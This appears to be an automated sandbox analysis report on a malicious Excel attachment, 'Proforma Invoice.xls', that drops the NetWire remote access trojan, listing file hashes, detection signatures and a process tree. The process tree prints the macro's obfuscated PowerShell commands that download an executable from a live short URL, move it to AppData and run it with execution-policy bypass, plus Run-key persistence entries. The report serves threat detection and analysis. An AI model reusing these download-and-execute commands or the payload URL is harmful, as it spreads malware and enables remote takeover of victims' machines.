Analysis
- max time kernel: 139s
- max time network: 135s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 19-11-2020 08:20
- Static task: static1
- Behavioral task: behavioral1
  - Sample: Proforma Invoice.xls
  - Resource: win7v20201028
- Behavioral task: behavioral2
  - Sample: Proforma Invoice.xls
  - Resource: win10v20201028
General
- Target: Proforma Invoice.xls
- Size: 74KB
- MD5: 55db711144ff4a35faf58d982e7cf727
- SHA1: ea7b59dde9f0600915069dec66f8410f25cb66fd
- SHA256: 6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
- SHA512: 92e99e23ef71f4b1b9e3f6733ca16d51a2e44a777581c6a4a9b35b4c3574620cbff37ba02052bd7932f75acd2b70a2750f4c53c0d87db75e8a10c4aa1cf4192a
Malware Config
- Extracted URL: https://cutt.ly/ZhqUH1O
Signatures
- NetWire RAT payload (3 IoCs)
  Processes:
  resource | yara_rule
  behavioral2/memory/2152-32-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
  behavioral2/memory/2152-33-0x000000000040242D-mapping.dmp | netwire
  behavioral2/memory/2152-35-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
- Process spawned unexpected child process (3 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: cmd.exe (3 instances)
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2392 | 2484 | cmd.exe | EXCEL.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2212 | 2484 | cmd.exe | EXCEL.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2980 | 2484 | cmd.exe | EXCEL.EXE
- Blacklisted process makes network request (2 IoCs)
  Processes: powershell.exe
  flow | pid | process
  21 | 2140 | powershell.exe
  23 | 2140 | powershell.exe
- Executes dropped EXE (2 IoCs)
  Processes: vx.exe (2 instances)
  pid | process
  3932 | vx.exe
  2152 | vx.exe
- Adds Run key to start application (2 TTPs, 3 IoCs)
  Processes: vx.exe (2 instances)
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\vlc = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\VideoLAN\\vlc.exe\"" | vx.exe
  Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ | vx.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\system-update = "C:\\Users\\Admin\\AppData\\Roaming\\vx.exe" | vx.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes: vx.exe
  description | pid | process | target process
  PID 3932 set thread context of 2152 | 3932 | vx.exe | vx.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: EXCEL.EXE
  pid | process
  2484 | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes: powershell.exe (3 instances)
  pid | process
  2140 | powershell.exe (3 entries)
  1176 | powershell.exe (3 entries)
  1180 | powershell.exe (3 entries)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: powershell.exe (3 instances), vx.exe
  description | pid | process
  Token: SeDebugPrivilege | 1180 | powershell.exe
  Token: SeDebugPrivilege | 2140 | powershell.exe
  Token: SeDebugPrivilege | 1176 | powershell.exe
  Token: SeDebugPrivilege | 3932 | vx.exe
- Suspicious use of SetWindowsHookEx (14 IoCs)
  Processes: EXCEL.EXE
  pid | process
  2484 | EXCEL.EXE (14 identical entries)
- Suspicious use of WriteProcessMemory (26 IoCs)
  Processes: EXCEL.EXE, cmd.exe (3 instances), powershell.exe, vx.exe
  description | pid | process | target process
  PID 2484 wrote to memory of 2392 | 2484 | EXCEL.EXE | cmd.exe (2 entries)
  PID 2484 wrote to memory of 2212 | 2484 | EXCEL.EXE | cmd.exe (2 entries)
  PID 2484 wrote to memory of 2980 | 2484 | EXCEL.EXE | cmd.exe (2 entries)
  PID 2212 wrote to memory of 1180 | 2212 | cmd.exe | powershell.exe (2 entries)
  PID 2980 wrote to memory of 1176 | 2980 | cmd.exe | powershell.exe (2 entries)
  PID 2392 wrote to memory of 2140 | 2392 | cmd.exe | powershell.exe (2 entries)
  PID 1176 wrote to memory of 3932 | 1176 | powershell.exe | vx.exe (3 entries)
  PID 3932 wrote to memory of 2152 | 3932 | vx.exe | vx.exe (11 entries)
Processes
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Proforma Invoice.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\cmd.exe (depth 2)
    Command line: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://cutt.ly/ZhqUH1O','vx.exe')
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://cutt.ly/ZhqUH1O','vx.exe')
      - Blacklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\cmd.exe (depth 2)
    Command line: cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item "vx.exe" -Destination "${enV`:appdata}"
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -w 1 stARt`-slE`Ep 20; Move-Item "vx.exe" -Destination "${enV`:appdata}"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\cmd.exe (depth 2)
    Command line: cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Roaming\vx.exe (depth 4)
        Command line: "C:\Users\Admin\AppData\Roaming\vx.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of SetThreadContext
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - C:\Users\Admin\AppData\Roaming\vx.exe (depth 5)
          Command line: "C:\Users\Admin\AppData\Roaming\vx.exe"
          - Executes dropped EXE
          - Adds Run key to start application
Downloads